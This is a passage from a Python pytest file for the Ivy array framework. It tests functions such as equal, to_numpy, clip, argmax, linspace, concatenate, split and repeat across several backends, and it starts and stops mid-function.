assert isinstance(res, bool) or ivy.is_array(res)
# value test
assert res == true_res
# compilation test
if not ivy.array_mode():
        helpers.assert_compilable(ivy.arrays_equal)
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.equal)
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_numpy)
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_scalar)
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.to_list)
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.shape)
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
if not ivy.array_mode():
        helpers.assert_compilable(ivy.get_num_dims)
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.minimum)
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.maximum)
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip)
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.clip_vector_norm)
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.round)
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floormod)
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.floor)
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.ceil)
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.abs)
# argmax
@pytest.mark.parametrize(
"x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# smoke test
x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
axis = x_n_axis_x_argmax[1]
ret = ivy.argmax(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmax)
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argmin)
# argsort
@pytest.mark.parametrize(
"x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
axis = x_n_axis_x_argsort[1]
ret = ivy.argsort(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (6,)
# value test
assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.argsort)
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Number type, or Union for Union[float, int] etc.
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.arange)
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.linspace)
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.logspace)
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.concatenate)
# flip
@pytest.mark.parametrize(
"x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
([[[-0.1471, 0.4477, 0.2214]]], None, None)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# smoke test
x, axis, bs = x_n_axis_n_bs
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.flip(x, axis, bs)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.flip)
# stack
@pytest.mark.parametrize(
"xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# smoke test
(x1, x2), axis = xs_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.stack((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = list(x1.shape)
expected_shape.insert(axis_val, 2)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.stack, (x1, x2), axis),
np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.stack)
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.unstack)
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.split)
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
